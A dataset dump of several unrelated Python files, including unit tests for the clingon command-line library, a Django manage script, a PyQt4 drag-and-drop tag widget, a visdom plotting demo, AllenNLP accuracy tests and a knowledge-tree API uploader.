self.assertEqual(out.getvalue(), '')
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
def test_option_short_bad_type(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1 p2 -s x')
self.assertEqual(err.getvalue(),
"usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
"Argument of option -s has wrong type (<int> expected)\n")
self.assertEqual(out.getvalue(), '')
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
def test_option_list_bad_type(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1 p2 --third-option 1 y')
self.assertEqual(err.getvalue(),
'usage: test_clingon.py p1 p2 [options] [--help | -?]\n'
'Argument 2 of option --third-option has wrong type (<int> expected)\n')
self.assertEqual(out.getvalue(), '')
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
def test_option_list_no_value(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1 p2 -t')
self.assertEqual(err.getvalue(),
"usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
"Option '-t' should be followed by a list of 2 <int>, found 0\n")
self.assertEqual(out.getvalue(), '')
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
def test_spec_option(self, sys_exit):
with captured_output() as (out, err):
clized_spec_shorts('p1 p2 -1 specific_value')
self.assertEqual(out.getvalue(),
"p1 p2 specific_value 5 [4, 3] False\n")
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(0)
def test_spec_option_again(self, sys_exit):
with captured_output() as (out, err):
clized_spec_shorts('p1 p2 -1 specific_value -so 12')
self.assertEqual(out.getvalue(),
"p1 p2 specific_value 12 [4, 3] False\n")
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(0)
def test_unknown_parameter(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1 p2 p3')
self.assertEqual(err.getvalue(),
"usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
"Unrecognized parameter 'p3'\n")
self.assertEqual(out.getvalue(), '')
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
def test_too_few_parameters(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1')
self.assertEqual(err.getvalue(),
"usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
"Too few parameters (2 required)\n")
self.assertEqual(out.getvalue(), '')
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
def test_duplicate_option(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1 p2 -l --last-option')
self.assertEqual(err.getvalue(),
"Option '--last-option' found twice\n")
self.assertEqual(out.getvalue(), '')
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
def test_option_missing_value(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('p1 p2 -s')
self.assertEqual(err.getvalue(),
"usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
"Option '-s' should be followed by a <int>\n")
self.assertEqual(out.getvalue(), '')
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
def test_return_integer(self, sys_exit):
with captured_output() as (out, err):
clized_spec_shorts('p1 p2 -l')
self.assertEqual(out.getvalue(), '')
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(12)
def test_debug(self, sys_exit):
clingon.DEBUG = True
try:
with captured_output() as (out, err):
clized_spec_shorts('p1 p2 -l')
finally:
clingon.DEBUG = False
self.assertEqual(out.getvalue(), "clize call parameters: ['p1', 'p2', 'default_value', 5, [4, 3], True]\n"
"Exit with code 12\n")
self.assertEqual(err.getvalue(), "")
sys_exit.assert_called_with(12)
def test_help_output(self, sys_exit):
with captured_output() as (out, err):
clized_default_shorts('-?')
output = out.getvalue()
self.assertIn(clized_default_shorts.docstring.strip(), output)
self.assertIn("Options:\n"
"--first-option | -f <str> (default='default_value')\n"
"--second-option | -s <int> (default=5)\n"
"--third-option | -t <list of int> (default=[4, 3])\n"
"--last-option | -l (default=False)\n"
"--help | -? print this help", output)
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(0)
def test_raise_nodebug(self, sys_exit):
with captured_output() as (out, err):
clized_that_raises('')
self.assertEqual(out.getvalue(), '')
self.assertEqual(err.getvalue(), "I just raise\n")
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
def test_raise_debug(self, sys_exit):
clingon.DEBUG = True
try:
with captured_output() as (out, err):
self.assertRaises(RuntimeError, clized_that_raises, '')
finally:
clingon.DEBUG = False
self.assertEqual(out.getvalue(), "clize call parameters: []\n")
self.assertEqual(err.getvalue(), "I just raise\n")
sys_exit.assert_not_called()
def test_varargs_novararg(self, sys_exit):
with captured_output() as (out, err):
clized_varargs('p1 p2 -o 123')
self.assertEqual(out.getvalue(), "p1 p2 123 ()\n")
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(0)
def test_varargs_varargs(self, sys_exit):
with captured_output() as (out, err):
clized_varargs('p1 p2 p3 p4 -o 123')
self.assertEqual(out.getvalue(), "p1 p2 123 ('p3', 'p4')\n")
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(0)
def test_varargs_bad_option(self, sys_exit):
with captured_output() as (out, err):
clized_varargs('p1 p2 p3 p4 -o 123 -x')
self.assertEqual(out.getvalue(), "")
self.assertEqual(err.getvalue(), "usage: test_clingon.py p1 p2 [varargs] [--option | -o <str> "
"(default='default_value')] [--help | -?]\nUnrecognized option '-x'\n")
sys_exit.assert_called_with(1)
def test_varargs_too_few_parameters(self, sys_exit):
with captured_output() as (out, err):
clized_varargs('p1')
self.assertEqual(err.getvalue(),
"usage: test_clingon.py p1 p2 [varargs] [--option | -o <str> "
"(default='default_value')] [--help | -?]\n"
"Too few parameters (2 required)\n")
self.assertEqual(out.getvalue(), '')
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
def test_version_usage(self, sys_exit):
with captured_output() as (out, err):
clized_variables('p1')
self.assertEqual(err.getvalue(),
"usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
"Too few parameters (2 required)\n")
self.assertEqual(out.getvalue(), '')
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
def test_variables_help_output(self, sys_exit):
with captured_output() as (out, err):
clized_variables('-?')
output = out.getvalue()
doc = clized_default_shorts.docstring.strip().format(VERSION='1.2.3',
message="you can dynamically customize help message !")
self.assertIn(doc, output)
self.assertIn("Options:\n"
"--long-name-option | -l <str> (default='default_value')\n"
"--version | -V print version (1.2.3)\n"
"--help | -? print this help", output)
self.assertEqual(err.getvalue(), '')
sys_exit.assert_called_with(0)
def test_version_one_short_usage(self, sys_exit):
with captured_output() as (out, err):
clized_variables_one_short('p1')
self.assertEqual(err.getvalue(),
"usage: test_clingon.py p1 p2 [--option | -o <str> "
"(default='default_value')] [--version | -V] [--help | -?]\n"
"Too few parameters (2 required)\n")
self.assertEqual(out.getvalue(), '')
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
def test_version_parameter(self, sys_exit):
with captured_output() as (out, err):
clized_variables('-V')
self.assertEqual(out.getvalue(), '')
error = err.getvalue()
self.assertIn('version 1.2.3 ', error)
sys_exit.assert_called_with(0)
@mock.patch('sys.exit')
class TestMakeScript(unittest.TestCase):
def test_no_parameter(self, sys_exit):
with captured_output() as (out, err):
clingon.clingon_script()('')
self.assertEqual(out.getvalue(), "")
self.assertEqual(err.getvalue(), "usage: clingon.py python_script [options] [--help | -?]\n"
"Too few parameters (1 required)\n")
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
def test_user_and_path(self, sys_exit):
with captured_output() as (out, err):
clingon.clingon_script()('clingon.py -u -p /usr/local/bin')
self.assertEqual(out.getvalue(), '')
self.assertEqual(err.getvalue(), 'usage: clingon.py python_script [options] [--help | -?]\n'
'You cannot specify --path and --user at the same time\n')
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
@mock.patch('os.path.exists')
@mock.patch('os.unlink')
def test_remove(self, os_unlink, os_path_exists, sys_exit):
with captured_output() as (out, err):
clingon.clingon_script()('clingon.py -r -p /usr/local/bin')
self.assertEqual(out.getvalue(), "Script '/usr/local/bin/clingon' removed\n")
os_unlink.assert_called_with('/usr/local/bin/clingon')
os_path_exists.assert_called_with('/usr/local/bin/clingon')
sys_exit.assert_called_with(0)
@mock.patch('os.path.exists', return_value=False)
def test_remove_no_target(self, os_path_exists, sys_exit):
with captured_output() as (out, err):
clingon.clingon_script()('clingon.py -r -p /usr/local/bin')
self.assertEqual(out.getvalue(), "Script '/usr/local/bin/clingon' not found, nothing to do\n")
os_path_exists.assert_called_with('/usr/local/bin/clingon')
sys_exit.assert_called_with(0)
@mock.patch('os.path.exists', return_value=False)
def test_no_source(self, os_path_exists, sys_exit):
with captured_output() as (out, err):
clingon.clingon_script()('toto.py')
self.assertIn('Could not find source', err.getvalue())
self.assertIn("toto.py', aborting", err.getvalue())
self.assertEqual(out.getvalue(), "")
path = err.getvalue().split()[4][1:-2]
os_path_exists.assert_called_with(path)
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
@mock.patch('os.path.islink')
@mock.patch('os.path.samefile')
@mock.patch('os.path.exists')
def test_target_exists_no_force(self, os_path_exists, os_path_samefile, os_path_islink, sys_exit):
with captured_output() as (out, err):
clingon.clingon_script()('clingon.py -p /usr/local/bin')
self.assertEqual(out.getvalue(), "")
self.assertEqual(err.getvalue(), "Target '/usr/local/bin/clingon' already exists, aborting\n")
sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)
@mock.patch('os.path.islink')
@mock.patch('os.path.samefile')
@mock.patch('os.path.exists')
def test_target_created_aborting(self, os_path_exists, os_path_samefile, os_path_islink, sys_exit):
with captured_output() as (out, err):
clingon.clingon_script()('clingon.py -l -p /usr/local/bin')
self.assertEqual(out.getvalue(), "Target '/usr/local/bin/clingon' already created, nothing to do\n")
sys_exit.assert_called_with(0)
@mock.patch('os.environ.get')
@mock.patch('os.chmod')
@mock.patch('os.stat', return_value=type('st', (object,), {'st_mode': 0}))
@mock.patch('shutil.copyfile')
@mock.patch('os.path.isdir')
@mock.patch('os.unlink')
def test_copy_target(self, os_unlink, os_path_isdir,
shutil_copyfile, os_stat, os_chmod, os_environ, sys_exit):
with mock.patch('os.path.exists'):
with mock.patch('os.path.samefile'):
with mock.patch('os.path.islink'):
with captured_output() as (out, err):
clingon.clingon_script()('clingon/clingon.py -f -p /usr/local/bin --no-check-shebang')
self.assertEqual(err.getvalue(), "")
self.assertIn("has been copied to /usr/local/bin/clingon", out.getvalue())
self.assertIn("Please add your local bin path [/usr/local/bin] to your environment PATH", out.getvalue())
os_path_isdir.assert_called_with('/usr/local/bin')
os_unlink.assert_called_with('/usr/local/bin/clingon')
os_chmod.assert_called_with('/usr/local/bin/clingon', 72)
sys_exit.assert_called_with(0)
@mock.patch('os.environ.get')
@mock.patch('os.chmod')
@mock.patch('os.stat', return_value=type('st', (object,), {'st_mode': 0}))
@mock.patch('os.symlink')
@mock.patch('os.path.isdir')
@mock.patch('os.unlink')
def test_symlink_target(self, os_unlink, os_path_isdir,
os_symlink, os_stat, os_chmod, os_environ, sys_exit):
with mock.patch('os.path.exists'):
with mock.patch('os.path.samefile', return_value=False):
with mock.patch('os.path.islink'):
with captured_output() as (out, err):
clingon.clingon_script()('clingon/clingon.py -f -l -p /usr/local/bin '
'--no-check-path --no-check-shebang')
self.assertEqual(err.getvalue(), "")
self.assertIn("has been symlinked to /usr/local/bin/clingon", out.getvalue())
os_path_isdir.assert_called_with('/usr/local/bin')
os_unlink.assert_called_with('/usr/local/bin/clingon')
os_chmod.assert_called_with('/usr/local/bin/clingon', 72)
sys_exit.assert_called_with(0)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1744431 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import sys
sys.dont_write_bytecode = True
MISSING_DEPENDENCIES = []
try:
from django.conf import settings
except ImportError:
MISSING_DEPENDENCIES.append("Django\>=1.11")
try:
from os import scandir
except ImportError:
try:
from scandir import scandir
except ImportError:
MISSING_DEPENDENCIES.append("scandir\>=1.5")
if MISSING_DEPENDENCIES:
deps = " ".join(MISSING_DEPENDENCIES)
sys.stdout.write("You'll need to `pip install {}` to run this demo\n".format(deps))
sys.exit(1)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
if __name__ == "__main__":
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| StarcoderdataPython |
3228453 | <gh_stars>0
from PyQt4 import QtCore, QtGui, Qt
class DragLabel(QtGui.QLabel):
def __init__(self, text, parent):
super(DragLabel, self).__init__(text, parent)
self.setMinimumSize(7 * (len(self.text().encode('utf-8')) + len(self.text())), 30)
self.setAlignment(Qt.Qt.AlignCenter)
self.setAutoFillBackground(True)
self.setFrameShape(QtGui.QFrame.Panel)
self.setFrameShadow(QtGui.QFrame.Raised)
self.setStyleSheet("QLabel{"
"border:1px solid #000000;"
"background-color: #FF7F66;"
"height: 25px;"
"font-family: '微软雅黑';"
"color: #FFFFFF;"
"font-size: 14px;"
"}"
"QLabel:hover{"
"border:1px solid #9BBAAC;"
"}"
"QLabel:focus{"
"border:1px solid #7ECEFD;"
"}")
def mousePressEvent(self, event):
hotSpot = event.pos()
mimeData = QtCore.QMimeData()
mimeData.setText(self.text())
mimeData.setData('application/x-point',
'%d %d' % (self.pos().x(), self.pos().y()))
pixmap = QtGui.QPixmap(self.size())
self.render(pixmap)
drag = QtGui.QDrag(self)
drag.setMimeData(mimeData)
drag.setPixmap(pixmap)
drag.setHotSpot(hotSpot)
dropAction = drag.exec_(QtCore.Qt.CopyAction | QtCore.Qt.MoveAction, QtCore.Qt.CopyAction)
if dropAction == QtCore.Qt.MoveAction:
self.close()
self.update()
class OkTagBox(QtGui.QWidget):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
x = 25
y = 5
for word in "我的 熱門呢 誒反對 sdf sdf sdf sdfsdf sdfsd dfsf sdf sdf sdf sdfsdf sdfsd dfsf sdf sdf sdf sdf我的 熱門呢 誒反對 sdf sdf sdf sdfsdf sdfsd dfsf sdf sdf sdf sdfsdf sdfsd dfsf sdf sdf sdf sdf".split():
wordLabel = DragLabel(word, self)
if x >= (self.size().width() - wordLabel.minimumWidth()):
x = 25
y += 32
wordLabel.move(x, y)
wordLabel.show()
x += wordLabel.minimumWidth() + 2
newPalette = self.palette()
newPalette.setColor(QtGui.QPalette.Window, QtGui.QColor(50, 50, 50))
self.setPalette(newPalette)
self.setAcceptDrops(True)
def resizeEvent(self, event):
x = 25
y = 5
for wordLabel in self.children():
if x >= (event.size().width() - wordLabel.minimumWidth()):
x = 25
y += 32
wordLabel.move(x, y)
x += wordLabel.minimumWidth() + 2
self.setMinimumHeight(y+40)
def dragEnterEvent(self, event):
if event.mimeData().hasText():
if event.source() in self.children():
event.setDropAction(QtCore.Qt.MoveAction)
event.accept()
else:
event.acceptProposedAction()
else:
event.ignore()
def dropEvent(self, event):
if event.mimeData().hasText():
mime = event.mimeData()
pieces = mime.text().split()
position = event.pos()
point = QtCore.QPoint()
pointxy = mime.data('application/x-point').split(' ')
if len(pointxy) == 2:
point.setX(pointxy[0].toInt()[0])
point.setY(pointxy[1].toInt()[0])
for piece in pieces:
newLabel = DragLabel(piece, self)
newLabel.move(point)
newLabel.show()
position += QtCore.QPoint(newLabel.width(), 0)
if event.source() in self.children():
event.setDropAction(QtCore.Qt.MoveAction)
event.accept()
else:
event.acceptProposedAction()
else:
event.ignore()
| StarcoderdataPython |
102478 | <filename>regrex1_in_python.py<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# # importing packages
# In[22]:
import pandas as pd
import sklearn
import numpy as np
import matplotlib.pyplot as plt
import sys
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
import argparse
#parser = argparse.ArgumentParser()
#parser.add_argument("file")
#args = parser.parse_args()
# # reading data
# In[23]:
regrex1 = pd.read_csv(sys.argv[1])
print("loading {}".format(sys.argv[1]))
# In[13]:
regrex1.plot.scatter(x='x',y='y', title='Scatter Plot in Python')
plt.savefig('py_orig.png')
plt.show()
# # making 1D model into 2D, splitting data into test and train
# In[14]:
data = sklearn.linear_model.LinearRegression()
x = regrex1['x'].values.reshape(-1,1)
y = regrex1['y'].values.reshape(-1,1)
x_train = x
x_test = x
y_train = y
y_test = y
# # training the algorithm
# In[15]:
regressor = LinearRegression()
regressor.fit(x_train, y_train)
y_pred = regressor.predict(x_test)
LinearRegression()
# # plot linear model with test data
# In[16]:
plt.scatter(x_test, y_test, color='gray')
plt.plot(x_test, y_pred, color='red', linewidth=2)
#mpl.plot()
plt.show()
# # plot linear model with original data
# In[17]:
plt.scatter(regrex1['x'], regrex1['y'], color = 'gray')
plt.plot(x_test, y_pred, color='red', linewidth=2)
plt.savefig('py_Im.png')
plt.show()
# In[ ]:
| StarcoderdataPython |
103579 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from visdom import Visdom
import numpy as np
import math
import os.path
import getpass
from sys import platform as _platform
from six.moves import urllib
viz = Visdom(port=8098,env='main')
assert viz.check_connection()
viz.close()
win = viz.line(
X = np.array([0,1]),
Y = np.array([0,1]),
opts = dict(
# xtickmin = -2,
# xtickmax = 2,
# xtickstep = 1,
# ytickmin = -3,
# ytickmax = 5,
# ytickstep = 1,
markersysmbol = 'dot',
markersize = 5,
showlegend = False,
),
name = '1'
)
viz.line(
X = np.array([0,1]),
Y = np.array([1,2]),
opts = dict(markercolor = np.array([50]),markersysmbol = 'dot',),
win = win,
update = 'new',
name = '2',
)
for i in range(10000):
viz.line(
X = np.array([i]),
Y = np.array([i * 2]),
win = win,
name = '1',
update='append'
)
viz.line(
X = np.array([i]),
Y = np.array([i*10]),
win = win,
name = '2',
update='append'
)
| StarcoderdataPython |
1745216 | <filename>build/setup.py
"""setuptools.setup() invocation, including all relevant arguments.
"""
import setuptools
def main():
"""Main call to setuptools.setup()
"""
name = "sdsu"
with open("README.rst", 'r') as f:
long_description = f.read()
setuptools.setup(
name=name,
version="1.0.0",
packages=setuptools.find_packages(),
install_requires=["tornado>=5.0.0"],
package_data={
name: ["security/*.csv", "security/*.pem", "static/*.css", "static/*.html"]
},
author="<NAME>",
author_email="<EMAIL>",
description="Skim milk. Gummy bears. Pure genius.",
long_description=long_description,
license="BSD",
keywords="tornado static web server secure websocket",
url="https://github.com/Tythos/" + name,
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Information Technology",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP",
"Programming Language :: Python :: 3",
],
)
if __name__ == "__main__":
main()
| StarcoderdataPython |
3340074 | <gh_stars>10-100
from bs4 import BeautifulSoup
from share.transform.chain.links import AbstractLink
from share.transform.chain import ChainTransformer
class SoupXMLDict:
def __init__(self, data=None, soup=None):
self.soup = soup or BeautifulSoup(data, 'lxml').html
def __getitem__(self, key):
if key[0] == '@':
return self.soup[key[1:]]
if key == '#text':
return self.soup.get_text()
res = self.soup.find_all(key)
if not res:
return None
if isinstance(res, list):
if len(res) > 1:
return [type(self)(soup=el) for el in res]
res = res[0]
return type(self)(soup=res)
def __getattr__(self, key):
return self[key]
def __repr__(self):
return '{}(\'{}\')'.format(self.__class__.__name__, self.soup)
class SoupLink(AbstractLink):
def __init__(self, *args, **kwargs):
self._args = args
self._kwargs = kwargs
super().__init__()
def execute(self, obj):
if not obj:
return None
if isinstance(obj, list):
res = [r for o in obj for r in o.soup.find_all(*self._args, **self._kwargs)]
else:
res = obj.soup.find_all(*self._args, **self._kwargs)
if not res:
return None
if isinstance(res, list):
if len(res) > 1:
return [SoupXMLDict(soup=el) for el in res]
res = res[0]
return SoupXMLDict(soup=res)
def Soup(chain, *args, **kwargs):
return chain + SoupLink(*args, **kwargs)
class SoupXMLTransformer(ChainTransformer):
REMOVE_EMPTY = False
def unwrap_data(self, data, **kwargs):
return SoupXMLDict(data)
| StarcoderdataPython |
3284626 | # pylint: disable=no-self-use,invalid-name,protected-access
import torch
import pytest
import numpy
from allennlp.common.testing import AllenNlpTestCase
from allennlp.common.checks import ConfigurationError
from allennlp.training.metrics import CategoricalAccuracy
class CategoricalAccuracyTest(AllenNlpTestCase):
def test_categorical_accuracy(self):
accuracy = CategoricalAccuracy()
predictions = torch.Tensor([[0.35, 0.25, 0.1, 0.1, 0.2],
[0.1, 0.6, 0.1, 0.2, 0.0]])
targets = torch.Tensor([0, 3])
accuracy(predictions, targets)
actual_accuracy = accuracy.get_metric()
assert actual_accuracy == 0.50
def test_top_k_categorical_accuracy(self):
accuracy = CategoricalAccuracy(top_k=2)
predictions = torch.Tensor([[0.35, 0.25, 0.1, 0.1, 0.2],
[0.1, 0.6, 0.1, 0.2, 0.0]])
targets = torch.Tensor([0, 3])
accuracy(predictions, targets)
actual_accuracy = accuracy.get_metric()
assert actual_accuracy == 1.0
def test_top_k_categorical_accuracy_accumulates_and_resets_correctly(self):
accuracy = CategoricalAccuracy(top_k=2)
predictions = torch.Tensor([[0.35, 0.25, 0.1, 0.1, 0.2],
[0.1, 0.6, 0.1, 0.2, 0.0]])
targets = torch.Tensor([0, 3])
accuracy(predictions, targets)
accuracy(predictions, targets)
accuracy(predictions, torch.Tensor([4, 4]))
accuracy(predictions, torch.Tensor([4, 4]))
actual_accuracy = accuracy.get_metric(reset=True)
assert actual_accuracy == 0.50
assert accuracy.correct_count == 0.0
assert accuracy.total_count == 0.0
def test_top_k_categorical_accuracy_respects_mask(self):
accuracy = CategoricalAccuracy(top_k=2)
predictions = torch.Tensor([[0.35, 0.25, 0.1, 0.1, 0.2],
[0.1, 0.6, 0.1, 0.2, 0.0],
[0.1, 0.2, 0.5, 0.2, 0.0]])
targets = torch.Tensor([0, 3, 0])
mask = torch.Tensor([0, 1, 1])
accuracy(predictions, targets, mask)
actual_accuracy = accuracy.get_metric()
assert actual_accuracy == 0.50
def test_top_k_categorical_accuracy_works_for_sequences(self):
accuracy = CategoricalAccuracy(top_k=2)
predictions = torch.Tensor([[[0.35, 0.25, 0.1, 0.1, 0.2],
[0.1, 0.6, 0.1, 0.2, 0.0],
[0.1, 0.6, 0.1, 0.2, 0.0]],
[[0.35, 0.25, 0.1, 0.1, 0.2],
[0.1, 0.6, 0.1, 0.2, 0.0],
[0.1, 0.6, 0.1, 0.2, 0.0]]])
targets = torch.Tensor([[0, 3, 4],
[0, 1, 4]])
accuracy(predictions, targets)
actual_accuracy = accuracy.get_metric(reset=True)
numpy.testing.assert_almost_equal(actual_accuracy, 0.6666666)
# Test the same thing but with a mask:
mask = torch.Tensor([[0, 1, 1],
[1, 0, 1]])
accuracy(predictions, targets, mask)
actual_accuracy = accuracy.get_metric(reset=True)
numpy.testing.assert_almost_equal(actual_accuracy, 0.50)
def test_top_k_categorical_accuracy_catches_exceptions(self):
accuracy = CategoricalAccuracy()
predictions = torch.rand([5, 7])
out_of_range_labels = torch.Tensor([10, 3, 4, 0, 1])
with pytest.raises(ConfigurationError):
accuracy(predictions, out_of_range_labels)
def test_tie_break_categorical_accuracy(self):
accuracy = CategoricalAccuracy(tie_break=True)
predictions = torch.Tensor([[0.35, 0.25, 0.35, 0.35, 0.35],
[0.1, 0.6, 0.1, 0.2, 0.2],
[0.1, 0.0, 0.1, 0.2, 0.2]])
# Test without mask:
targets = torch.Tensor([2, 1, 4])
accuracy(predictions, targets)
assert accuracy.get_metric(reset=True) == (0.25 + 1 + 0.5)/3.0
# # # Test with mask
mask = torch.Tensor([1, 0, 1])
targets = torch.Tensor([2, 1, 4])
accuracy(predictions, targets, mask)
assert accuracy.get_metric(reset=True) == (0.25 + 0.5)/2.0
# # Test tie-break with sequence
predictions = torch.Tensor([[[0.35, 0.25, 0.35, 0.35, 0.35],
[0.1, 0.6, 0.1, 0.2, 0.2],
[0.1, 0.0, 0.1, 0.2, 0.2]],
[[0.35, 0.25, 0.35, 0.35, 0.35],
[0.1, 0.6, 0.1, 0.2, 0.2],
[0.1, 0.0, 0.1, 0.2, 0.2]]])
targets = torch.Tensor([[0, 1, 3], # 0.25 + 1 + 0.5
[0, 3, 4]]) # 0.25 + 0 + 0.5 = 2.5
accuracy(predictions, targets)
actual_accuracy = accuracy.get_metric(reset=True)
numpy.testing.assert_almost_equal(actual_accuracy, 2.5/6.0)
def test_top_k_and_tie_break_together_catches_exceptions(self):
with pytest.raises(ConfigurationError):
CategoricalAccuracy(top_k=2, tie_break=True)
def test_incorrect_top_k_catches_exceptions(self):
with pytest.raises(ConfigurationError):
CategoricalAccuracy(top_k=0)
| StarcoderdataPython |
3392103 | __author__ = 'naras_mg'
# libraries
# import matplotlib as plt
import json, logging, requests
import networkx as nx
prefix = 'http://api.iyengarlabs.org/v1/'
# own modules
import knowledgeTreeModelSmall as ktm
def entity_json_dict_list(rows):
rowsDictList = []
for row in rows:
db_flds = row.__dict__['__data__'] # get all the db field names/values .. a dictionary
rowsDictList.append(db_flds)
return rowsDictList
def addChild(node_id, rel, entity, jsonFields, valid_relations):
response = requests.post(prefix + entity + '/add', json=jsonFields, headers={'parentid': node_id, 'relation': valid_relations[rel]})
name_title = 'title' if entity in ['subject', 'work'] else 'name'
if response.status_code in [200, 201]:
responseAsDict = json.loads(response.text)
logging.debug('added apiIyengar node: name %s id: %s parent %s', jsonFields[name_title], responseAsDict[entity]['_id'], node_id)
else:
logging.debug('failed to add apiIyengar under %s node:%s child: %s status: %i', entity, node_id, json[name_title], response.status_code)
raise ConnectionError('post status:' + str(response.status_code))
return responseAsDict
def refreshGraph(nodes, edges, entity='subject'):
g = nx.DiGraph()
for row in nodes:
g.add_node(row['id'])
if entity == 'subject':
g.nodes[row['id']]['name'] = row['name']
if 'description' in row: g.nodes[row['id']]['description'] = row['description']
elif entity=='work':
g.nodes[row['id']]['name'] = row['name']
if 'components' in row: g.nodes[row['id']]['components'] = row['components']
else: # entity=='person':
if 'first' in row: g.nodes[row['id']]['name'] = row['first']
if 'middle' in row and not row['middle']==None: g.nodes[row['id']]['name'] += ' ' + row['middle']
if 'last' in row and not row['last']==None: g.nodes[row['id']]['name'] += ' ' + row['last']
if 'birth' in row: g.nodes[row['id']]['birth'] = row['birth']
if 'death' in row: g.nodes[row['id']]['birth'] = row['birth']
if 'biography' in row: g.nodes[row['id']]['biography'] = row['biography']
for row in edges:
g.add_edge(row[entity + '1'],row[entity + '2'])
g[row[entity + '1']][row[entity + '2']]['relation'] = row['relation']
# if 'sortorder' in row: g[row['subject1']][row['subject2']]['sortorder'] = row['sortorder']
return g
def tree_Navigate(g, edges, dictList, parent_pred_pair, parent, entity='subject'):
dependant_structures = {'subject':{'other':'description', 'valid_relations':
{'adhaara': 'ADHAARA_ADHAARI', 'Anga': 'ANGA_ANGI', 'Anonya': 'ANONYA_ASHRAYA', 'Ashraya': 'ASHRAYA_ASHREYI', 'Avayavi': 'AVAYAVI',
'darshana': 'DARSHANA', 'Dharma': 'DHARMA_DHARMI', 'Janya': 'JANYA_JANAKA', 'Kaarya': 'KAARYA_KAARANA', 'Nirupaka': 'NIRUPYA_NIRUPAKA',
'part': 'ANGA', 'Prakaara': 'PRAKAARA_PRAKAARI', 'parentchil': 'COMMON_PARENT', 'Uddheshya': 'UDDHESHYA_VIDHEYA', 'upa': 'UPAVEDA',
'Upabrahmya': 'UPABRAHMYA_UPABRAHMANA','upani': 'UPANISHAD', 'Vishaya': 'VISHAYA_VISHAYI'}},
'work':{'other':'components', 'valid_relations':
{'adhaara': 'ADHAARA_ADHAARI', 'Anga': 'ANGA_ANGI', 'Anonya': 'ANONYA_ASHRAYA', 'Ashraya': 'ASHRAYA_ASHREYI', 'Avayavi': 'AVAYAVI',
'darshana': 'DARSHANA', 'Dharma': 'DHARMA_DHARMI', 'Janya': 'JANYA_JANAKA', 'Kaarya': 'KAARYA_KAARANA', 'Nirupaka': 'NIRUPYA_NIRUPAKA',
'part': 'ANGA', 'Prakaara': 'PRAKAARA_PRAKAARI', 'parentchil': 'COMMON_PARENT', 'Uddheshya': 'UDDHESHYA_VIDHEYA', 'upa': 'UPAVEDA',
'Upabrahmya': 'UPABRAHMYA_UPABRAHMANA', 'upani': 'UPANISHAD', 'Vishaya': 'VISHAYA_VISHAYI', 'chapter': 'CHAPTER',
'commentary': 'COMMENTARY', 'subcommentary': 'SUB_COMMENTARY', 'comcommentary': 'COMMENTARY_ON_COMMENTARY', 'derived': 'DERIVED',
'partwhole': 'PART_WHOLE_RELATION', 'section': 'SECTION', 'subsection': 'SUB_SECTION', 'volume': 'VOLUME'}},
'person':{'other':None, 'valid_relations':{'gurushishya':'GURISHISHYA', 'classmate':'CONTEMPORARY'}}}
valid_relations = dependant_structures[entity]['valid_relations']
for child, rel in edges.items():
try:
child_properties = [entry for entry in dictList if entry['id'] == child][0]
if parent in parent_pred_pair:
pred = parent_pred_pair[parent]
jsonFields = {'subject':{'title': getIfExists(child_properties,'name'), 'description': getIfExists(child_properties,'description')},
'work':{'title': getIfExists(child_properties,'name'), 'tags':[], 'components':[{'type': 'TEXT', 'langcode': 'Sanskrit',
'scriptcode': 'Devanagari','body': getIfExists(child_properties,'description'), 'hyperlink': ''}]},
'person':{'name': getIfExists(child_properties, 'first') + getIfExists(child_properties, 'middle') + getIfExists(child_properties, 'last'),
'biography': getIfExists(child_properties, 'biography')}}[entity]
# print(jsonFields)
pred = addChild(pred, rel['relation'], entity, jsonFields, valid_relations)
